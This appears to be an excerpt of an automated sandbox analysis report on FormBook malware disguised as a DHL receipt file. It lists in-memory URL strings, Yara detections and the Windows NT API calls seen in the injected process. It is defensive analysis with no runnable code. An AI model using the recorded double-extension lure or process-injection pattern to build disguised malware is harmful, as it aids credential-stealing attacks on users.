Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiaoyingzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xingyezhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xishizhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiuchangzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiulizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiumozhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiupazhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiyezhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xuetuzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yecaozhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yechuizhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yewuzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yueguangzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yumba.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yundouzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yundouzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yurenzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.zeeshop.net
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EhStorAuthn.exe, 00000006.00000002.3761155390.0000000006252000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003C72000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: EhStorAuthn.exe, 00000006.00000002.3761155390.0000000005C0A000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.000000000362A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://error.skycloud.tw/system/error?code=400
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
Source: EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1699728207.0000000002E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: EhStorAuthn.exe, 00000006.00000003.1699728207.0000000002E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033$
Source: EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1699728207.0000000002E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: EhStorAuthn.exe, 00000006.00000003.1699728207.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: EhStorAuthn.exe, 00000006.00000003.1698803766.0000000007D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://push.zhanzhang.baidu.com/push.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://white.anva.org.cn/
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.12377.cn/
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zzlz.gsxt.gov.cn/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3759977939.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3760294780.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1506080108.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3762178583.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3758608396.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509448492.0000000002100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1505225494.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3760130827.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: DHL AWB Receipt_pdf.bat.exe
Source: initial sample	Static PE information: Filename: DHL AWB Receipt_pdf.bat.exe

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0042C763 NtClose,	4_2_0042C763
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422B60 NtClose,LdrInitializeThunk,	4_2_01422B60
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01422DF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01422C70
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014235C0 NtCreateMutant,LdrInitializeThunk,	4_2_014235C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01424340 NtSetContextThread,	4_2_01424340
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01424650 NtSuspendThread,	4_2_01424650
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422BE0 NtQueryValueKey,	4_2_01422BE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422BF0 NtAllocateVirtualMemory,	4_2_01422BF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422B80 NtQueryInformationFile,	4_2_01422B80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422BA0 NtEnumerateValueKey,	4_2_01422BA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422AD0 NtReadFile,	4_2_01422AD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422AF0 NtWriteFile,	4_2_01422AF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422AB0 NtWaitForSingleObject,	4_2_01422AB0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422D00 NtSetInformationFile,	4_2_01422D00
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422D10 NtMapViewOfSection,	4_2_01422D10
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422D30 NtUnmapViewOfSection,	4_2_01422D30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422DD0 NtDelayExecution,	4_2_01422DD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422DB0 NtEnumerateKey,	4_2_01422DB0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422C60 NtCreateKey,	4_2_01422C60
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422C00 NtQueryInformationProcess,	4_2_01422C00
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422CC0 NtQueryVirtualMemory,	4_2_01422CC0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422CF0 NtOpenProcess,	4_2_01422CF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422CA0 NtQueryInformationToken,	4_2_01422CA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422F60 NtCreateProcessEx,	4_2_01422F60
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422F30 NtCreateSection,	4_2_01422F30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422FE0 NtCreateFile,	4_2_01422FE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422F90 NtProtectVirtualMemory,	4_2_01422F90
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422FA0 NtQuerySection,	4_2_01422FA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422FB0 NtResumeThread,	4_2_01422FB0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422E30 NtWriteVirtualMemory,	4_2_01422E30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422EE0 NtQueueApcThread,	4_2_01422EE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422E80 NtReadVirtualMemory,	4_2_01422E80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422EA0 NtAdjustPrivilegesToken,	4_2_01422EA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01423010 NtOpenDirectoryObject,	4_2_01423010
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01423090 NtSetValueKey,	4_2_01423090
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014239B0 NtGetContextThread,	4_2_014239B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01423D70 NtOpenThread,	4_2_01423D70
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01423D10 NtOpenProcessToken,	4_2_01423D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB4650 NtSuspendThread,LdrInitializeThunk,	6_2_04DB4650
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB4340 NtSetContextThread,LdrInitializeThunk,	6_2_04DB4340
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04DB2CA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04DB2C70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2C60 NtCreateKey,LdrInitializeThunk,	6_2_04DB2C60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04DB2DD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04DB2DF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04DB2D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_04DB2D30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_04DB2EE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_04DB2E80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2FE0 NtCreateFile,LdrInitializeThunk,	6_2_04DB2FE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2FB0 NtResumeThread,LdrInitializeThunk,	6_2_04DB2FB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2F30 NtCreateSection,LdrInitializeThunk,	6_2_04DB2F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2AD0 NtReadFile,LdrInitializeThunk,	6_2_04DB2AD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2AF0 NtWriteFile,LdrInitializeThunk,	6_2_04DB2AF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04DB2BF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04DB2BE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04DB2BA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2B60 NtClose,LdrInitializeThunk,	6_2_04DB2B60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB35C0 NtCreateMutant,LdrInitializeThunk,	6_2_04DB35C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB39B0 NtGetContextThread,LdrInitializeThunk,	6_2_04DB39B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2CC0 NtQueryVirtualMemory,	6_2_04DB2CC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2CF0 NtOpenProcess,	6_2_04DB2CF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2C00 NtQueryInformationProcess,	6_2_04DB2C00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2DB0 NtEnumerateKey,	6_2_04DB2DB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2D00 NtSetInformationFile,	6_2_04DB2D00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2EA0 NtAdjustPrivilegesToken,	6_2_04DB2EA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2E30 NtWriteVirtualMemory,	6_2_04DB2E30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2F90 NtProtectVirtualMemory,	6_2_04DB2F90
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2FA0 NtQuerySection,	6_2_04DB2FA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2F60 NtCreateProcessEx,	6_2_04DB2F60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2AB0 NtWaitForSingleObject,	6_2_04DB2AB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB2B80 NtQueryInformationFile,	6_2_04DB2B80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB3090 NtSetValueKey,	6_2_04DB3090
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB3010 NtOpenDirectoryObject,	6_2_04DB3010
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB3D70 NtOpenThread,	6_2_04DB3D70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04DB3D10 NtOpenProcessToken,	6_2_04DB3D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CD9200 NtCreateFile,	6_2_02CD9200
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CD9370 NtReadFile,	6_2_02CD9370
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CD9670 NtAllocateVirtualMemory,	6_2_02CD9670
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CD9460 NtDeleteFile,	6_2_02CD9460
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CD9500 NtClose,	6_2_02CD9500

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_00D83E40	0_2_00D83E40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_00D8D6FC	0_2_00D8D6FC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_04D0E528	0_2_04D0E528
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_04D0D3E8	0_2_04D0D3E8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_04D0E519	0_2_04D0E519
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_04D0B775	0_2_04D0B775
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_04D0B778	0_2_04D0B778
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00418823	4_2_00418823
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0041009A	4_2_0041009A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004100A3	4_2_004100A3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00416A1E	4_2_00416A1E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00416A23	4_2_00416A23
